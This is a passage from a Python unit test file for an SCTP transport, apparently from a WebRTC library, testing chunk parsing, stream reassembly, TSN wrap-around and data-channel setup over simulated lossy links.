self.assertEqual(str(cm.exception), 'SCTP packet length is less than 12 bytes')
def test_parse_cookie_echo(self):
data = load('sctp_cookie_echo.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, CookieEchoChunk))
self.assertEqual(chunk.type, 10)
self.assertEqual(chunk.flags, 0)
self.assertEqual(len(chunk.body), 8)
def test_parse_abort(self):
data = load('sctp_abort.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, AbortChunk))
self.assertEqual(chunk.type, 6)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(13, b'Expected B-bit for TSN=4ce1f17f, SID=0001, SSN=0000'),
])
def test_parse_data(self):
data = load('sctp_data.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, DataChunk))
self.assertEqual(chunk.type, 0)
self.assertEqual(chunk.flags, 3)
self.assertEqual(chunk.tsn, 2584679421)
self.assertEqual(chunk.stream_id, 1)
self.assertEqual(chunk.stream_seq, 1)
self.assertEqual(chunk.protocol, 51)
self.assertEqual(chunk.user_data, b'ping')
self.assertEqual(repr(chunk),
'DataChunk(flags=3, tsn=2584679421, stream_id=1, stream_seq=1)')
def test_parse_data_padding(self):
data = load('sctp_data_padding.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, DataChunk))
self.assertEqual(chunk.type, 0)
self.assertEqual(chunk.flags, 3)
self.assertEqual(chunk.tsn, 2584679421)
self.assertEqual(chunk.stream_id, 1)
self.assertEqual(chunk.stream_seq, 1)
self.assertEqual(chunk.protocol, 51)
self.assertEqual(chunk.user_data, b'M')
self.assertEqual(repr(chunk),
'DataChunk(flags=3, tsn=2584679421, stream_id=1, stream_seq=1)')
def test_parse_error(self):
data = load('sctp_error.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ErrorChunk))
self.assertEqual(chunk.type, 9)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(1, b'\x30\x39\x00\x00'),
])
def test_parse_forward_tsn(self):
data = load('sctp_forward_tsn.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ForwardTsnChunk))
self.assertEqual(chunk.type, 192)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.cumulative_tsn, 1234)
self.assertEqual(chunk.streams, [
(12, 34),
])
self.assertEqual(repr(chunk),
'ForwardTsnChunk(cumulative_tsn=1234, streams=[(12, 34)])')
def test_parse_heartbeat(self):
data = load('sctp_heartbeat.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, HeartbeatChunk))
self.assertEqual(chunk.type, 4)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(1, b'\xb5o\xaaZvZ\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00{\x10\x00\x00'
b'\x004\xeb\x07F\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
])
def test_parse_reconfig_reset_out(self):
data = load('sctp_reconfig_reset_out.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ReconfigChunk))
self.assertEqual(chunk.type, 130)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(13, b'\x8b\xd8\n[\xe4\x8b\xecs\x8b\xd8\n^\x00\x01')
])
# Outgoing SSN Reset Request Parameter
param_data = chunk.params[0][1]
param = StreamResetOutgoingParam.parse(param_data)
self.assertEqual(param.request_sequence, 2346191451)
self.assertEqual(param.response_sequence, 3834375283)
self.assertEqual(param.last_tsn, 2346191454)
self.assertEqual(param.streams, [1])
self.assertEqual(bytes(param), param_data)
def test_parse_reconfig_add_out(self):
data = load('sctp_reconfig_add_out.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ReconfigChunk))
self.assertEqual(chunk.type, 130)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(17, b'\xca\x02\xf60\x00\x10\x00\x00')
])
# Add Outgoing Streams Request Parameter
param_data = chunk.params[0][1]
param = StreamAddOutgoingParam.parse(param_data)
self.assertEqual(param.request_sequence, 3389191728)
self.assertEqual(param.new_streams, 16)
self.assertEqual(bytes(param), param_data)
def test_parse_reconfig_response(self):
data = load('sctp_reconfig_response.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ReconfigChunk))
self.assertEqual(chunk.type, 130)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(16, b'\x91S\x1fT\x00\x00\x00\x01')
])
# Re-configuration Response Parameter
param_data = chunk.params[0][1]
param = StreamResetResponseParam.parse(param_data)
self.assertEqual(param.response_sequence, 2438143828)
self.assertEqual(param.result, 1)
self.assertEqual(bytes(param), param_data)
def test_parse_sack(self):
data = load('sctp_sack.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, SackChunk))
self.assertEqual(chunk.type, 3)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.cumulative_tsn, 2222939037)
self.assertEqual(chunk.gaps, [(2, 2), (4, 4)])
self.assertEqual(chunk.duplicates, [2222939041])
self.assertEqual(repr(chunk),
'SackChunk(flags=0, advertised_rwnd=128160, cumulative_tsn=2222939037, '
'gaps=[(2, 2), (4, 4)])')
def test_parse_shutdown(self):
data = load('sctp_shutdown.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ShutdownChunk))
self.assertEqual(repr(chunk),
'ShutdownChunk(flags=0, cumulative_tsn=2696426712)')
self.assertEqual(chunk.type, 7)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.cumulative_tsn, 2696426712)
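# ChunkFactory builds sequences of SCTP DATA chunks for the stream tests below: create()
# emits one chunk per fragment, sets SCTP_DATA_FIRST_FRAG / SCTP_DATA_LAST_FRAG on the
# boundary fragments, assigns consecutive TSNs, and (for ordered chunks) a per-message
# stream sequence number.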
class ChunkFactory:
def __init__(self, tsn=1):
self.tsn = tsn
self.stream_seq = 0
def create(self, frags, ordered=True):
chunks = []
for i, frag in enumerate(frags):
flags = 0
if not ordered:
flags |= SCTP_DATA_UNORDERED
if i == 0:
flags |= SCTP_DATA_FIRST_FRAG
if i == len(frags) - 1:
flags |= SCTP_DATA_LAST_FRAG
chunk = DataChunk(flags=flags)
chunk.protocol = 123
chunk.stream_id = 456
if ordered:
chunk.stream_seq = self.stream_seq
chunk.tsn = self.tsn
chunk.user_data = frag
chunks.append(chunk)
self.tsn += 1
if ordered:
self.stream_seq += 1
return chunks
class SctpStreamTest(TestCase):
def setUp(self):
self.factory = ChunkFactory()
def test_duplicate(self):
stream = InboundStream()
chunks = self.factory.create([b'foo', b'bar', b'baz'])
# feed first chunk
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
# feed first chunk again
with self.assertRaises(AssertionError) as cm:
stream.add_chunk(chunks[0])
self.assertEqual(str(cm.exception), 'duplicate chunk in reassembly')
def test_whole_in_order(self):
stream = InboundStream()
chunks = (
self.factory.create([b'foo']) +
self.factory.create([b'bar']))
# feed first unfragmented
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'foo'),
])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 1)
# feed second unfragmented
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 1)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'bar'),
])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 2)
def test_whole_out_of_order(self):
stream = InboundStream()
chunks = (
self.factory.create([b'foo']) +
self.factory.create([b'bar']) +
self.factory.create([b'baz', b'qux']))
# feed second unfragmented
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed third partial
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
# feed first unfragmented
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0], chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'foo'),
(456, 123, b'bar'),
])
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 2)
def test_fragments_in_order(self):
stream = InboundStream()
chunks = self.factory.create([b'foo', b'bar', b'baz'])
# feed first chunk
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
# feed second chunk
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[0], chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[0], chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed third chunk
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [
chunks[0], chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'foobarbaz'),
])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 1)
def test_fragments_out_of_order(self):
stream = InboundStream()
chunks = self.factory.create([b'foo', b'bar', b'baz'])
# feed third chunk
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 0)
# feed first chunk
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[0], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
# feed second chunk
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [
chunks[0], chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'foobarbaz'),
])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 1)
def test_unordered_no_fragments(self):
stream = InboundStream()
chunks = (
self.factory.create([b'foo'], ordered=False) +
self.factory.create([b'bar'], ordered=False) +
self.factory.create([b'baz'], ordered=False))
# feed second unfragmented
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'bar')])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 0)
# feed third unfragmented
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'baz')])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 0)
# feed first unfragmented
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'foo')])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 0)
def test_unordered_with_fragments(self):
stream = InboundStream()
chunks = (
self.factory.create([b'foo', b'bar'], ordered=False) +
self.factory.create([b'baz'], ordered=False) +
self.factory.create([b'qux', b'quux', b'corge'], ordered=False))
# feed second fragment of first message
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed second message
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'baz')])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed first fragment of third message
stream.add_chunk(chunks[3])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3]])
self.assertEqual(stream.sequence_number, 0)
# feed third fragment of third message
stream.add_chunk(chunks[5])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3], chunks[5]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3], chunks[5]])
self.assertEqual(stream.sequence_number, 0)
# feed second fragment of third message
stream.add_chunk(chunks[4])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3], chunks[4], chunks[5]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'quxquuxcorge')])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed first fragment of first message
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0], chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'foobar')])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 0)
def test_prune_chunks(self):
stream = InboundStream()
factory = ChunkFactory(tsn=100)
chunks = (
factory.create([b'foo', b'bar']) +
factory.create([b'baz', b'qux']))
for i in [1, 2]:
stream.add_chunk(chunks[i])
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
stream.sequence_number = 2
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 2)
self.assertEqual(stream.prune_chunks(101), 3)
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 2)
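# TSNs are 32-bit serial numbers, so tsn_plus_one / tsn_minus_one wrap modulo 2**32,
# e.g. tsn_plus_one(4294967295) == 0; the assertions below exercise exactly that wrap-around.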
class SctpUtilTest(TestCase):
def test_tsn_minus_one(self):
self.assertEqual(tsn_minus_one(0), 4294967295)
self.assertEqual(tsn_minus_one(1), 0)
self.assertEqual(tsn_minus_one(4294967294), 4294967293)
self.assertEqual(tsn_minus_one(4294967295), 4294967294)
def test_tsn_plus_one(self):
self.assertEqual(tsn_plus_one(0), 1)
self.assertEqual(tsn_plus_one(1), 2)
self.assertEqual(tsn_plus_one(4294967294), 4294967295)
self.assertEqual(tsn_plus_one(4294967295), 0)
class RTCSctpTransportTest(TestCase):
def setUp(self):
self.client_transport, self.server_transport = dummy_dtls_transport_pair()
def tearDown(self):
run(self.client_transport.stop())
run(self.server_transport.stop())
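    # The assertTimer* helpers return small context managers that snapshot the client's
    # _t3_handle (the T3 retransmission timer) on entry and, on exit, assert that it was
    # preserved, restarted, or stopped respectively.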
def assertTimerPreserved(self, client):
test = self
class Ctx:
def __enter__(self):
self.previous_timer = client._t3_handle
def __exit__(self, exc_type, exc_value, traceback):
test.assertIsNotNone(client._t3_handle)
test.assertEqual(client._t3_handle, self.previous_timer)
return Ctx()
def assertTimerRestarted(self, client):
test = self
class Ctx:
def __enter__(self):
self.previous_timer = client._t3_handle
def __exit__(self, exc_type, exc_value, traceback):
test.assertIsNotNone(client._t3_handle)
test.assertNotEqual(client._t3_handle, self.previous_timer)
return Ctx()
def assertTimerStopped(self, client):
test = self
class Ctx:
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
test.assertIsNone(client._t3_handle)
return Ctx()
def test_construct(self):
sctpTransport = RTCSctpTransport(self.client_transport)
self.assertEqual(sctpTransport.transport, self.client_transport)
self.assertEqual(sctpTransport.port, 5000)
def test_construct_invalid_dtls_transport_state(self):
run(self.client_transport.stop())
with self.assertRaises(InvalidStateError):
RTCSctpTransport(self.client_transport)
def test_connect_broken_transport(self):
"""
Transport with 100% loss never connects.
"""
loss_pattern = [True]
self.client_transport.transport._connection.loss_pattern = loss_pattern
self.server_transport.transport._connection.loss_pattern = loss_pattern
client = RTCSctpTransport(self.client_transport)
client._rto = 0.1
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
server._rto = 0.1
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(client.state, 'closed')
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server.state, 'connecting')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(client.state, 'closed')
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server.state, 'closed')
def test_connect_lossy_transport(self):
"""
Transport with 25% loss eventually connects.
"""
loss_pattern = [True, False, False, False]
self.client_transport.transport._connection.loss_pattern = loss_pattern
self.server_transport.transport._connection.loss_pattern = loss_pattern
client = RTCSctpTransport(self.client_transport)
client._rto = 0.1
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
server._rto = 0.1
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client.state, 'connected')
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server.state, 'connected')
# transmit data
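        # the server's internal _receive hook is replaced so each delivered message can be
        # pulled off a queue and compared with the tuple the client sent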
server_queue = asyncio.Queue()
async def server_fake_receive(*args):
await server_queue.put(args)
server._receive = server_fake_receive
for i in range(20):
message = (123, i, b'ping')
run(client._send(*message))
received = run(server_queue.get())
self.assertEqual(received, message)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(client.state, 'closed')
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server.state, 'closed')
def test_connect_client_limits_streams(self):
client = RTCSctpTransport(self.client_transport)
client._inbound_streams_max = 2048
client._outbound_streams_count = 256
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 2048)
self.assertEqual(client._outbound_streams_count, 256)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 256)
self.assertEqual(server._outbound_streams_count, 2048)
self.assertEqual(server._remote_extensions, [192, 130])
# client requests additional outbound streams
param = StreamAddOutgoingParam(
request_sequence=client._reconfig_request_seq,
new_streams=16)
run(client._send_reconfig_param(param))
run(asyncio.sleep(0.1))
self.assertEqual(server._inbound_streams_count, 272)
self.assertEqual(server._outbound_streams_count, 2048)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_server_limits_streams(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
server._inbound_streams_max = 2048
server._outbound_streams_count = 256
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 256)
self.assertEqual(client._outbound_streams_count, 2048)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 2048)
self.assertEqual(server._outbound_streams_count, 256)
self.assertEqual(server._remote_extensions, [192, 130])
run(asyncio.sleep(0.1))
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_data_channel(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(client, RTCDataChannelParameters(label='chat'))
self.assertEqual(channel.id, None)
self.assertEqual(channel.label, 'chat')
run(asyncio.sleep(0.1))
self.assertEqual(channel.id, 1)
self.assertEqual(channel.label, 'chat')
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 1)
self.assertEqual(server_channels[0].id, 1)
self.assertEqual(server_channels[0].label, 'chat')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_data_channel_with_custom_id(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(client, RTCDataChannelParameters(label='chat', id=100))
self.assertEqual(channel.id, 100)
self.assertEqual(channel.label, 'chat')
# create second data channel
channel2 = RTCDataChannel(client, RTCDataChannelParameters(label='chat', id=101))
self.assertEqual(channel2.id, 101)
self.assertEqual(channel2.label, 'chat')
run(asyncio.sleep(0.1))
self.assertEqual(channel.id, 100)
self.assertEqual(channel.label, 'chat')
self.assertEqual(channel2.id, 101)
self.assertEqual(channel2.label, 'chat')
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 2)
self.assertEqual(server_channels[0].id, 100)
self.assertEqual(server_channels[0].label, 'chat')
self.assertEqual(server_channels[1].id, 101)
self.assertEqual(server_channels[1].label, 'chat')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_data_channel_with_custom_id_and_then_normal(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(client, RTCDataChannelParameters(label='chat', id=1))
self.assertEqual(channel.id, 1)
self.assertEqual(channel.label, 'chat')
# create second data channel
channel2 = RTCDataChannel(client, RTCDataChannelParameters(label='chat'))
self.assertEqual(channel2.id, None)
self.assertEqual(channel2.label, 'chat')
run(asyncio.sleep(0.1))
self.assertEqual(channel.id, 1)
self.assertEqual(channel.label, 'chat')
self.assertEqual(channel2.id, 3)
self.assertEqual(channel2.label, 'chat')
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 2)
self.assertEqual(server_channels[0].id, 1)
self.assertEqual(server_channels[0].label, 'chat')
self.assertEqual(server_channels[1].id, 3)
self.assertEqual(server_channels[1].label, 'chat')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_second_data_channel_with_custom_already_used_id(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(client, RTCDataChannelParameters(label='chat', id=100))
self.assertEqual(channel.id, 100)
self.assertEqual(channel.label, 'chat')
# create second data channel with the same id
self.assertRaises(ValueError,
lambda: RTCDataChannel(client,
RTCDataChannelParameters(label='chat', id=100)))
run(asyncio.sleep(0.1))
self.assertEqual(channel.id, 100)
self.assertEqual(channel.label, 'chat')
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 1)
self.assertEqual(server_channels[0].id, 100)
self.assertEqual(server_channels[0].label, 'chat')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_negotiated_data_channel_without_id(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
self.assertRaises(
ValueError,
lambda: RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True
),
),
)
run(asyncio.sleep(0.1))
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_and_server_creates_negotiated_data_channel(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel for client
channel_client = RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_client.id, 100)
